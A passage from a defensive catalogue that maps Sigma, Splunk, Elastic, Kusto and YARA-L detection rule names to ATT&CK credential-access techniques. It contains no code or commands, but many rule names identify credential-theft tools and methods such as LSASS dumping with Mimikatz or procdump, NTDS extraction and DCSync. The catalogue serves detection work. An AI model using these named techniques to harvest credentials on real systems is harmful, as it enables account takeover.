- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows Remote Access Software BRC4 Loaded Dll production
- Splunk Windows Sensitive Registry Hive Dump Via CommandLine production
- Elastic Wireless Credential Dumping using Netsh Command production
OS Credential Dumping: LSASS Memory T1003.001 149 rules
- Splunk Access LSASS Memory for Dump Creation production
- Sigma APT31 Judgement Panda Activity test
- Splunk Common LSASS Memory Dump Behavior (Windows Event Log)
- Splunk comsvcs.dll Lsass Memory Dump (Sysmon)
- Splunk comsvcs.dll Lsass Memory Dump (Windows Event Log)
- Splunk Create Remote Thread into LSASS production
- Sigma CreateDump Process Dump test
- YARA-L CreateDump Process Dump
- Splunk Creation of lsass Dump with Taskmgr production
- Sigma Cred Dump Tools Dropped Files test
- YARA-L Cred Dump Tools Dropped Files
- Sigma Credential Dumping Activity By Python Based Tool stable
- Sigma Credential Dumping Attempt Via WerFault test
- YARA-L Credential Dumping Attempt Via WerFault
- Kusto Credential Dumping Tools - File Artifacts available
- Kusto Credential Dumping Tools - Service Installation available
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process test
- Splunk Detect Credential Dumping through LSASS access production
- Elastic Disabling Lsa Protection via Registry Modification production
- Splunk Dump LSASS via comsvcs DLL production
- Splunk Dump LSASS via procdump production
- Kusto Dumping LSASS Process Into a File available
- Sigma Dumping Process via Sqldumper.exe test
- Sigma DumpMinitool Execution test
- Elastic Full User-Mode Dumps Enabled System-Wide production
- Sigma HackTool - CrackMapExec File Indicators test
- Sigma HackTool - CrackMapExec Process Patterns test
- Sigma HackTool - CreateMiniDump Execution test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Doppelanger LSASS Dumper Execution experimental
- Sigma HackTool - Dumpert Process Dumper Default File test
- YARA-L HackTool - Dumpert Process Dumper Default File
- Sigma HackTool - Dumpert Process Dumper Execution test
- YARA-L HackTool - Dumpert Process Dumper Execution
- Sigma HackTool - Generic Process Access test
- YARA-L HackTool - Generic Process Access
- Sigma HackTool - HandleKatz Duplicating LSASS Handle test
- Sigma HackTool - HandleKatz LSASS Dumper Execution test
- Sigma HackTool - Impacket File Indicators experimental
- Sigma HackTool - Inveigh Execution test
- Sigma HackTool - Mimikatz Execution test
- YARA-L HackTool - Mimikatz Execution
- Sigma HackTool - SafetyKatz Dump Indicator test
- Sigma HackTool - SafetyKatz Execution test
- Sigma HackTool - Windows Credential Editor (WCE) Execution test
- Sigma HackTool - WSASS Execution experimental
- Sigma HackTool - XORDump Execution test
- Sigma LSASS Access Detected via Attack Surface Reduction test
- Sigma LSASS Access From Non System Account test
- Sigma LSASS Access From Potentially White-Listed Processes test
- Sigma LSASS Access From Program In Potentially Suspicious Folder test
- Sigma LSASS credential dump with LSASSY (admin share) experimental
- Sigma LSASS credential dump with LSASSY (kernel access) experimental
- Sigma LSASS credential dump with LSASSY (PowerShell) experimental
- Sigma LSASS credential dump with LSASSY (process) experimental
- Sigma LSASS Dump Keyword In CommandLine test
- YARA-L LSASS Dump Keyword In CommandLine
- Sigma LSASS dump via process access experimental
- Kusto LSASS Dumping using Debug Privileges
- Sigma Lsass Full Dump Request Via DumpType Registry Settings test
- Splunk LSASS Handle request (Windows Event Log)
- Sigma LSASS Memory Access by Tool With Dump Keyword In Name test
- YARA-L LSASS Memory Access by Tool With Dump Keyword In Name
- Elastic LSASS Memory Dump Handle Access production
- Sigma Lsass Memory Dump via Comsvcs DLL test
- YARA-L Lsass Memory Dump via Comsvcs DLL
- Sigma LSASS Process Crashed - Application experimental
- Sigma LSASS Process Dump Artefact In CrashDumps Folder test
- Sigma LSASS process dump by a non system account experimental
- Sigma LSASS Process Memory Dump Creation Via Taskmgr.EXE test
- YARA-L LSASS Process Memory Dump Creation Via Taskmgr.exe
- Sigma LSASS Process Memory Dump Files test
- YARA-L LSASS Process Memory Dump Files
- Elastic Memory Dump File with Unusual Extension production
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Elastic Modification of WDigest Security Provider production
- Splunk MultiDump.exe Execution (Sysmon)
- Splunk MultiDump.exe Execution (Windows Event Log)
- Sigma NotPetya Ransomware Activity test
- Sigma Password Dumper Activity on LSASS test
- Sigma Password Dumper Remote Thread in LSASS stable
- Sigma Potential Adplus.EXE Abuse test
- Elastic Potential Credential Access via DuplicateHandle in LSASS production
- Elastic Potential Credential Access via LSASS Memory Dump production
- Elastic Potential Credential Access via Memory Dump File Creation production
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Credential Access via Windows Utilities production
- Sigma Potential Credential Dumping Activity Via LSASS test
- YARA-L Potential Credential Dumping Activity Via LSASS
- Sigma Potential Credential Dumping Attempt Via PowerShell test
- Sigma Potential Credential Dumping Attempt Via PowerShell Remote Thread test
- Sigma Potential Credential Dumping Via LSASS Process Clone test
- Sigma Potential Credential Dumping Via LSASS SilentProcessExit Technique test
- YARA-L Potential Credential Dumping Via LSASS SilentProcessExit Technique
- Sigma Potential Credential Dumping Via WER test
- Elastic Potential LSASS Clone Creation via PssCaptureSnapShot production
- Elastic Potential LSASS Memory Dump via PssCaptureSnapShot production
- Sigma Potential LSASS Process Dump Via Procdump stable
- YARA-L potential lsass process dump via procdump
- Sigma Potential SAM database user credentials dumped with DCshadow experimental
- Sigma Potential SysInternals ProcDump Evasion test
- Sigma Potential Windows Defender AV Bypass Via Dump64.EXE Rename test
- Sigma Potentially Suspicious AccessMask Requested From LSASS test
- Sigma Potentially Suspicious GrantedAccess Flags On LSASS test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get-Process LSASS in ScriptBlock test
- Sigma PPL Tampering Via WerFaultSecure experimental
- Splunk ProcDump Credential Harvest (Sysmon)
- Splunk ProcDump Credential Harvest (Windows Event Log)
- Sigma Procdump Execution test
- Sigma Process Access via TrolleyExpress Exclusion test
- Sigma Process Memory Dump Via Comsvcs.DLL test
- YARA-L Process Memory Dump Via Comsvcs.DLL
- Sigma Process Memory Dump via RdrLeakDiag.EXE test
- YARA-L Process Memory Dump via RdrLeakDiag.exe
- Sigma PUA - Memory Dump Mount Via MemProcFS experimental
- Splunk pypykatz commands (Windows Event Log)
- Splunk RdrLeakDiag.exe Memory Dump (PowerShell)
- Splunk RdrLeakDiag.exe Memory Dump (Sysmon)
- Splunk RdrLeakDiag.exe Memory Dump (Windows Event Log)
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Renamed CreateDump Utility Execution test
- YARA-L Renamed CreateDump Utility Execution
- Sigma SAM database user credentials dump with Mimikatz experimental
- Sigma Suspicious DumpMinitool Execution test
- Sigma Suspicious LSASS Access Via MalSecLogon test
- Elastic Suspicious LSASS Access via MalSecLogon production
- Elastic Suspicious Lsass Process Access production
- Elastic Suspicious Module Loaded by LSASS production
- Sigma Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs experimental
- Sigma Suspicious Renamed Comsvcs DLL Loaded By Rundll32 test
- Sigma Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded test
- Sigma Task Manager access indicator for potential LSASS dump experimental
- Splunk Task Manager lsass Dump (Windows Event Log)
- Sigma Task Manager used for LSASS dump (kernel) experimental
- Sigma Time Travel Debugging Utility Usage test
- Sigma Time Travel Debugging Utility Usage - Image test
- Sigma Transferring Files with Credential Data via Network Shares test
- Sigma Uncommon GrantedAccess Flags On LSASS test
- Sigma Unsigned Image Loaded Into LSASS Process test
- Sigma WerFault LSASS Process Memory Dump test
- Splunk Windows Credential Dumping LSASS Memory Createdump production
- Sigma Windows Credential Editor Registry test
- Splunk Windows Hunting System Account Targeting Lsass production
- Splunk Windows Non-System Account Targeting Lsass production
- Splunk Windows Possible Credential Dumping production
OS Credential Dumping: Security Account Manager T1003.002 48 rules
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Copying Sensitive Files with Credential Data test
- Sigma Crash Dump Created By Operating System experimental
- Sigma Cred Dump Tools Dropped Files test
- Elastic Credential Acquisition via Registry Hive Dumping production
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma Critical Hive In Suspicious Location Access Bits Cleared test
- Splunk Detect Copy of ShadowCopy with Script Block Logging production
- Sigma Dumping of Sensitive Hives Via Reg.EXE test
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Splunk Esentutl SAM Copy production
- Sigma Esentutl Volume Shadow Copy Service Keys test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Mimikatz Execution test
- Sigma HackTool - Pypykatz Credentials Dumping Activity test
- Sigma HackTool - Quarks PwDump Execution test
- Sigma HackTool - QuarksPwDump Dump File test
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Splunk MultiDump.exe Execution (Sysmon)
- Splunk MultiDump.exe Execution (Windows Event Log)
- Elastic NTDS Dump via Wbadmin production
- Elastic NTDS or SAM Database File Copied production
- Sigma NTDS.DIT Creation By Uncommon Process test
- Sigma Possible Impacket SecretDump Remote Activity test
- Elastic Potential Credential Access via Trusted Developer Utility production
- Elastic Potential Remote Credential Access via Registry production
- Sigma Potential SAM Database Dump test
- Sigma PowerShell SAM Copy test
- Sigma PUA - Memory Dump Mount Via MemProcFS experimental
- Splunk SAM Database File Access Attempt production
- Splunk SAM, System, Security Files Accessed (Windows Event Log)
- Sigma Secretdump password dumping via SMB admin share experimental
- Splunk SecretsDump Credential Harvest (Windows Event Log)
- Sigma Sensitive File Dump Via Print.EXE test
- Sigma Shadow Copies Creation Using Operating Systems Utilities test
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Elastic Symbolic Link to Shadow Copy Created production
- Sigma Transferring Files with Credential Data via Network Shares test
- Sigma Volume Shadow Copy Mount test
- Sigma VolumeShadowCopy Symlink Creation Via Mklink stable
- Sigma VSSAudit Security Event Source Registration test
- Splunk Windows Rapid Authentication On Multiple Hosts production
- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows Sensitive Registry Hive Dump Via CommandLine production
OS Credential Dumping: NTDS T1003.003 54 rules
- Splunk ADExplorer Execution (Sysmon)
- Splunk ADExplorer Execution (Windows Event Log)
- Splunk ADExplorer Snapshot Creation (Sysmon)
- Splunk ADExplorer Snapshot Creation (Windows Event Log)
- Sigma Copying Sensitive Files with Credential Data test
- Sigma Create Volume Shadow Copy with Powershell test
- Splunk Creation of Shadow Copy production
- Splunk Creation of Shadow Copy with wmic and powershell production
- Sigma Cred Dump Tools Dropped Files test
- Splunk Credential Dumping via Copy Command from Shadow Copy production
- Splunk Credential Dumping via Symlink to Shadow Copy production
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Sigma Esentutl Gather Credentials test
- Sigma IFM creation detected from commandline (installation from media) experimental
- Sigma IFM detected - ESENT (installation from media) experimental
- Sigma Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) test
- YARA-L MITRE ATT&CK T1003.003 RW Utilities Associated With Ntds.dit
- YARA-L MITRE ATT&CK T1003.003 WMIC Ntds.dit CISA Report
- Elastic NTDS Dump via Wbadmin production
- Sigma NTDS Exfiltration Filename Patterns test
- Elastic NTDS or SAM Database File Copied production
- Splunk ntds.dit Access from Unexpected Location (Sysmon)
- Splunk ntds.dit Access from Unexpected Location (Windows Event Log)
- Splunk ntds.dit Command Line (PowerShell)
- Splunk ntds.dit Command Line (Sysmon)
- Splunk ntds.dit Command Line (Windows Event Log)
- Sigma NTDS.DIT Created test
- Sigma NTDS.DIT Creation By Uncommon Parent Process test
- Sigma NTDS.DIT Creation By Uncommon Process test
- Sigma Ntdsutil Abuse test
- Splunk Ntdsutil Export NTDS production
- Splunk NTDSUtil.exe execution (Sysmon)
- Splunk NTDSUtil.exe execution (Windows Event Log)
- Sigma Possible Impacket SecretDump Remote Activity test
- Elastic Potential Credential Access via Windows Utilities production
- Sigma Potential Russian APT Credential Theft Activity stable
- Sigma PUA - DIT Snapshot Viewer test
- Splunk SecretDumps Offline NTDS Dumping Tool production
- Sigma Sensitive File Dump Via Print.EXE test
- Sigma Sensitive File Dump Via Wbadmin.EXE test
- Sigma Sensitive File Recovery From Backup Via Wbadmin.EXE test
- Sigma Shadow Copies Creation Using Operating Systems Utilities test
- Splunk Shadow Copy Created (Windows Event Log)
- Sigma Suspicious Get-ADDBAccount Usage test
- Splunk Suspicious ntds.dit Commands (PowerShell)
- Splunk Suspicious ntds.dit Commands (Sysmon)
- Splunk Suspicious ntds.dit Commands (Windows Event Log)
- Sigma Suspicious Process Patterns NTDS.DIT Exfil test
- Sigma Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) test
- Elastic Symbolic Link to Shadow Copy Created production
- Sigma Transferring Files with Credential Data via Network Shares test
- Sigma VolumeShadowCopy Symlink Creation Via Mklink stable
OS Credential Dumping: LSA Secrets T1003.004 16 rules
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Cred Dump Tools Dropped Files test
- Elastic Credential Acquisition via Registry Hive Dumping production
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma DPAPI Domain Backup Key Extraction test
- Sigma DPAPI Domain Master Key Backup Attempt test
- Sigma Dumping of Sensitive Hives Via Reg.EXE test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Mimikatz Execution test
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma Possible Impacket SecretDump Remote Activity test
- Sigma PUA - Memory Dump Mount Via MemProcFS experimental
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Splunk Windows LSA Secrets NoLMhash Registry production
OS Credential Dumping: Cached Domain Credentials T1003.005 13 rules
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Cred Dump Tools Dropped Files test
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Sigma Dumping of Sensitive Hives Via Reg.EXE test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Mimikatz Execution test
- Sigma New Generic Credentials Added Via Cmdkey.EXE test
- Sigma Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE test
- Splunk WDigest Forced Credential Caching (PowerShell)
- Splunk WDigest Forced Credential Caching (Sysmon)
- Splunk WDigest Forced Credential Caching (Windows Event Log)
- Splunk Windows Cached Domain Credentials Reg Query production
OS Credential Dumping: DCSync T1003.006 19 rules
- Sigma Active Directory Replication from Non Machine Account test
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Splunk Excessive DRSGetNCChanges Requests (Windows Event Log)
- Sigma Exchange group membership change to perform DCsync attack experimental
- Elastic First Time Seen Account Performing DCSync production
- Sigma HackTool - Mimikatz Execution test
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma Mimikatz DC Sync test
- Sigma NetSYnc attack experimental
- Kusto Non Domain Controller Active Directory Replication available
- Elastic Potential Active Directory Replication Account Backdoor production
- Elastic Potential Credential Access via DCSync production
- Splunk Potential DCSync (Windows Event Log)
- Sigma Replication privileges accessed to perform DCSync attack experimental
- Sigma Suspicious Get-ADReplAccount test
- Splunk Windows AD Replication Request Initiated by User Account production
- Splunk Windows AD Replication Request Initiated from Unsanctioned Location production
OS Credential Dumping: /etc/passwd and /etc/shadow T1003.008 1 rule
- Elastic Suspicious Execution via Windows Subsystem for Linux production
Network Sniffing T1040 9 rules
- Sigma Harvesting Of Wifi Credentials Via Netsh.EXE test
- Sigma New Network Trace Capture Started Via Netsh.EXE test
- Sigma PktMon.EXE Execution test
- Sigma Potential Network Sniffing Activity Using Network Tools test
- Sigma Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Windows native Pktmon sniffer abuse experimental
- Sigma Windows Pcap Drivers test
- Sigma Windows traffic capture abuse experimental
Input Capture T1056 10 rules
- Sigma CredUI.DLL Loaded By Uncommon Process test
- Sigma DNS Query Request To OneLaunch Update Service test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Potential Keylogger Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Keylogging test
- Sigma PUA - Mouse Lock Execution test
- Splunk Windows Input Capture Using Credential UI Dll production
Input Capture: Keylogging T1056.001 3 rules
- Sigma Potential Keylogger Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Keylogging test
Input Capture: GUI Input Capture T1056.002 3 rules
- Sigma CredUI.DLL Loaded By Uncommon Process test
- Sigma PUA - Mouse Lock Execution test
- Splunk Windows Input Capture Using Credential UI Dll production
Input Capture: Credential API Hooking T1056.004 4 rules
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Brute Force T1110 45 rules
- Kusto Brute force attack against user credentials (Uses Authentication Normalization)
- Splunk Detect Password Spray Attack Behavior From Source production
- Splunk Detect Password Spray Attack Behavior On User production
- Splunk Detect Password Spray Attempts production
- Kusto Excessive Windows Logon Failures available
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Kusto Failed logon attempts by valid accounts within 10 mins
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - Hashcat Password Cracker Execution test
- Sigma HackTool - Hydra Password Bruteforce Execution test
- YARA-L MITRE ATT&CK T1110.001 Windows Repeated Authentication Failures Before Successful One
- YARA-L MITRE ATT&CK T1110.001 Windows Repeated Authentication Failures Before Successful One With User Entity
- YARA-L MITRE ATT&CK T1110.003 RW Windows Password Spray
- Splunk Multiple Failed Network Logon Attempts from Host (Windows Event Log)
- Elastic Multiple Logon Failure Followed by Logon Success production
- Elastic Multiple Logon Failure from the same Source Address production
- Kusto Multiple Password Reset by user
- Kusto Password Spraying available
- Splunk Password Spraying Windows (Windows Event Log)
- Kusto Potential Password Spray Attack (Uses Authentication Normalization)
- Elastic Privileged Accounts Brute Force production
- Splunk RDP Brute-force Detection (Windows Event Log)
- Kusto Remote Desktop Network Brute force (ASIM Network Session schema) available
- Kusto SecurityEvent - Multiple authentication failures followed by a success available
- Sigma Suspicious Connection to Remote Account test
- Splunk Suspicious Login Failures (Windows Event Log)
- Splunk Windows Local Administrator Credential Stuffing production
- Splunk Windows Multiple Disabled Users Failed To Authenticate Wth Kerberos production
- Splunk Windows Multiple Invalid Users Fail To Authenticate Using Kerberos production
- Splunk Windows Multiple Invalid Users Failed To Authenticate Using NTLM production
- Splunk Windows Multiple Users Fail To Authenticate Wth ExplicitCredentials production
- Splunk Windows Multiple Users Failed To Authenticate From Host Using NTLM production
- Splunk Windows Multiple Users Failed To Authenticate From Process production
- Splunk Windows Multiple Users Failed To Authenticate Using Kerberos production
- Splunk Windows Multiple Users Remotely Failed To Authenticate From Host production
- Splunk Windows Remote Desktop Network Bruteforce Attempt production
- Splunk Windows Unusual Count Of Disabled Users Failed Auth Using Kerberos production
- Splunk Windows Unusual Count Of Invalid Users Fail To Auth Using Kerberos production
- Splunk Windows Unusual Count Of Invalid Users Failed To Auth Using NTLM production
- Splunk Windows Unusual Count Of Users Fail To Auth Wth ExplicitCredentials production
- Splunk Windows Unusual Count Of Users Failed To Auth Using Kerberos production
- Splunk Windows Unusual Count Of Users Failed To Authenticate From Process production
- Splunk Windows Unusual Count Of Users Failed To Authenticate Using NTLM production
- Splunk Windows Unusual Count Of Users Remotely Failed To Auth From Host production
Brute Force: Password Guessing T1110.001 10 rules
- Sigma HackTool - Hydra Password Bruteforce Execution test
- YARA-L MITRE ATT&CK T1110.001 Windows Repeated Authentication Failures Before Successful One
- YARA-L MITRE ATT&CK T1110.001 Windows Repeated Authentication Failures Before Successful One With User Entity
- Elastic Multiple Logon Failure Followed by Logon Success production
- Elastic Multiple Logon Failure from the same Source Address production
- Elastic Privileged Accounts Brute Force production
- Splunk RDP Brute-force Detection (Windows Event Log)
- Sigma Suspicious Connection to Remote Account test
- Splunk Suspicious Login Failures (Windows Event Log)
- Splunk Windows Remote Desktop Network Bruteforce Attempt production
Brute Force: Password Spraying T1110.003 26 rules
- Splunk Detect Password Spray Attack Behavior From Source production
- Splunk Detect Password Spray Attack Behavior On User production
- Splunk Detect Password Spray Attempts production
- YARA-L MITRE ATT&CK T1110.003 RW Windows Password Spray
- Splunk Multiple Failed Network Logon Attempts from Host (Windows Event Log)
- Elastic Multiple Logon Failure Followed by Logon Success production
- Elastic Multiple Logon Failure from the same Source Address production
- Kusto Password Spraying available
- Splunk Password Spraying Windows (Windows Event Log)
- Elastic Privileged Accounts Brute Force production
- Splunk Windows Multiple Disabled Users Failed To Authenticate Wth Kerberos production
- Splunk Windows Multiple Invalid Users Fail To Authenticate Using Kerberos production
- Splunk Windows Multiple Invalid Users Failed To Authenticate Using NTLM production
- Splunk Windows Multiple Users Fail To Authenticate Wth ExplicitCredentials production
- Splunk Windows Multiple Users Failed To Authenticate From Host Using NTLM production
- Splunk Windows Multiple Users Failed To Authenticate From Process production
- Splunk Windows Multiple Users Failed To Authenticate Using Kerberos production
- Splunk Windows Multiple Users Remotely Failed To Authenticate From Host production
- Splunk Windows Unusual Count Of Disabled Users Failed Auth Using Kerberos production
- Splunk Windows Unusual Count Of Invalid Users Fail To Auth Using Kerberos production
- Splunk Windows Unusual Count Of Invalid Users Failed To Auth Using NTLM production
- Splunk Windows Unusual Count Of Users Fail To Auth Wth ExplicitCredentials production
- Splunk Windows Unusual Count Of Users Failed To Auth Using Kerberos production
- Splunk Windows Unusual Count Of Users Failed To Authenticate From Process production
- Splunk Windows Unusual Count Of Users Failed To Authenticate Using NTLM production
- Splunk Windows Unusual Count Of Users Remotely Failed To Auth From Host production
Brute Force: Credential Stuffing T1110.004 1 rule
- Splunk Windows Local Administrator Credential Stuffing production
Forced Authentication T1187 21 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Splunk DNS Kerberos Coercion production
- Sigma NTLM Hash Leak Via Curl NTLM Authentication test
- Kusto NTLM Relay Attack
- Splunk PetitPotam Network Share Access Request production
- Sigma PetitPotam Suspicious Kerberos TGT Request test
- Sigma Possible PetitPotam Coerce Authentication Attempt test
- Elastic Potential Computer Account NTLM Relay Activity production
- Sigma Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI test
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Local NTLM Relay via HTTP production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit experimental
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Exploitation for Credential Access T1212 6 rules
- Sigma Audit CVE Event test
- Sigma GALLIUM IOCs test
- Sigma Kerberos Manipulation test
- Elastic Potential Local NTLM Relay via HTTP production
- Sigma Suspicious NTLM Authentication on the Printer Spooler Service test
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
Steal Web Session Cookie T1539 3 rules
- Elastic Browser Process Spawned from an Unusual Parent production
- Sigma SQLite Chromium Profile Data DB Access test
- Sigma SQLite Firefox Profile Data DB Access test
Unsecured Credentials T1552 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Splunk Add DefaultUser And Password In Registry production
- Splunk ADExplorer Execution (Sysmon)
- Splunk ADExplorer Execution (Windows Event Log)
- Splunk ADExplorer Snapshot Creation (Sysmon)
- Splunk ADExplorer Snapshot Creation (Windows Event Log)
- YARA-L ADFS DKM Key Access
- Elastic Attempted Private Key Access production
- Splunk Attempted Veeam Database Credential Dump (PowerShell)
- Splunk Attempted Veeam Database Credential Dump (Sysmon)
- Splunk Attempted Veeam Database Credential Dump (Windows Event Log)
- Splunk Auto Admin Logon Registry Entry production
- Sigma Automated Collection Command Prompt test
- Sigma Certificate Exported Via PowerShell test
- Sigma Certificate Exported Via PowerShell - ScriptBlock test
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Credentials in Registry (Windows Event Log)
- Sigma DPAPI Backup Keys And Certificate Export Activity IOC test
- Sigma Enumeration for 3rd Party Creds From CLI test
- Sigma Enumeration for Credentials in Registry test
- Sigma EventLog Query Requests By Builtin Utilities test
- Sigma Extracting Information with PowerShell test
- Sigma Findstr GPP Passwords test
- Sigma HackTool - Typical HiveNightmare SAM File Export test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Splunk Locate Credentials (PowerShell)
- Splunk Locate Credentials (Sysmon)
- Splunk Locate Credentials (Windows Event Log)
- Sigma LSASS Process Reconnaissance Via Findstr.EXE test
- Elastic Microsoft IIS Connection Strings Decryption production
- Elastic Microsoft IIS Service Account Password Dumped production
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Splunk Mimikatz Execution (Windows Event Log)
- Sigma Permission Misconfiguration Reconnaissance Via Findstr.EXE test
- Sigma PFX File Creation test
- Sigma Potential Password Reconnaissance Via Findstr.EXE test
- Sigma Potential PowerShell Console History Access Attempt via History File experimental
- Sigma Potential Russian APT Credential Theft Activity stable
- Sigma Potentially Suspicious EventLog Recon Activity Using Log Query Utilities test
- Sigma Potentially Suspicious JWT Token Search Via CLI test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get-Process LSASS test
- Sigma Private Keys Reconnaissance Via CommandLine Tools test
- Sigma PUA - TruffleHog Execution experimental
- Sigma Registry Export of Third-Party Credentials experimental
- Sigma Remote File Download Via Findstr.EXE test
- Sigma SAM Registry Hive Handle Request test
- Sigma Script Interpreter Spawning Credential Scanner - Windows experimental
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Shai-Hulud Malicious GitHub Workflow Creation experimental
- Elastic Suspicious CertUtil Commands production
- Sigma Suspicious SYSVOL Domain Group Policy Access test
- Splunk Windows Credentials in Registry Reg Query production
- Splunk Windows Export Certificate production
- Splunk Windows Findstr GPP Discovery production
- Splunk Windows LAPS Password Gathering Via PowerShell Script production
- Splunk Windows PowerShell Export Certificate production
- Splunk Windows PowerShell Export PfxCertificate production
- Splunk Windows PowerSploit GPP Discovery production
- Splunk Windows Private Keys Discovery production
- Splunk Windows Unsecured Outlook Credentials Access In Registry production
- Splunk Windows Unusual FileZilla XML Config Access production
- Splunk Windows Unusual Intelliform Storage Registry Access production
- Elastic Wireless Credential Dumping using Netsh Command production
Unsecured Credentials: Credentials In Files T1552.001 30 rules
- Splunk ADExplorer Execution (Sysmon)
- Splunk ADExplorer Execution (Windows Event Log)
- Splunk ADExplorer Snapshot Creation (Sysmon)
- Splunk ADExplorer Snapshot Creation (Windows Event Log)
- Splunk Attempted Veeam Database Credential Dump (PowerShell)
- Splunk Attempted Veeam Database Credential Dump (Sysmon)
- Splunk Attempted Veeam Database Credential Dump (Windows Event Log)
- Sigma Automated Collection Command Prompt test
- Sigma Extracting Information with PowerShell test
- Sigma HackTool - Typical HiveNightmare SAM File Export test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Splunk Locate Credentials (PowerShell)
- Splunk Locate Credentials (Sysmon)
- Splunk Locate Credentials (Windows Event Log)
- Elastic Microsoft IIS Connection Strings Decryption production
- Elastic Microsoft IIS Service Account Password Dumped production
- Sigma Potential Password Reconnaissance Via Findstr.EXE test
- Sigma Potential PowerShell Console History Access Attempt via History File experimental
- Sigma Potential Russian APT Credential Theft Activity stable
- Sigma Potentially Suspicious JWT Token Search Via CLI test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - TruffleHog Execution experimental
- Sigma Remote File Download Via Findstr.EXE test
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Shai-Hulud Malicious GitHub Workflow Creation experimental
- Splunk Windows Unusual FileZilla XML Config Access production
- Splunk Windows Unusual Intelliform Storage Registry Access production
- Elastic Wireless Credential Dumping using Netsh Command production
Unsecured Credentials: Credentials in Registry T1552.002 10 rules
- Splunk Add DefaultUser And Password In Registry production
- Splunk Auto Admin Logon Registry Entry production
- Splunk Credentials in Registry (Windows Event Log)
- Sigma Enumeration for 3rd Party Creds From CLI test
- Sigma Enumeration for Credentials in Registry test
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma Registry Export of Third-Party Credentials experimental
- Sigma SAM Registry Hive Handle Request test
- Splunk Windows Credentials in Registry Reg Query production
Unsecured Credentials: Private Keys T1552.004 15 rules
- Elastic Access to a Sensitive LDAP Attribute production
- YARA-L ADFS DKM Key Access
- Elastic Attempted Private Key Access production
- Sigma Certificate Exported Via PowerShell test
- Sigma Certificate Exported Via PowerShell - ScriptBlock test
- Sigma DPAPI Backup Keys And Certificate Export Activity IOC test
